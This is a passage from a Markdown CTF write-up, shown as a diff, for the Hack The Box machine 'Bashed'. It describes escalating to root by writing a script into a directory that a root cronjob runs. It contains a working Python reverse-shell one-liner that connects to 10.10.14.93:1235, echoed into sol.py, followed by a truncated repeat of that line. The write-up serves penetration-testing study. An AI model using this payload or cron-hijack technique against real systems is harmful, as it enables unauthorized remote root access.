Rogue-1/HTB/FullPWN/Bashed.md

 -rw-r--r--  1 scriptmanager scriptmanager  110 Aug 15 10:19 test.py
 -rw-r--r--  1 root          root            12 Aug 15 10:19 test.txt
 ```
+We are going to set up 1 last reverse shell in order to gain root.
+We are going to make our own reverse shell script taken from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

+We are going to use the python reverse shell since its being executed in a python script and set up our listener to catch it.
+After a minute or so the cronjob executes the script from the directory and we get our reverse shell and the flag!!

 ```console
 scriptmanager@bashed:/scripts$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.93",1235));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > sol.py
 <);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > sol.py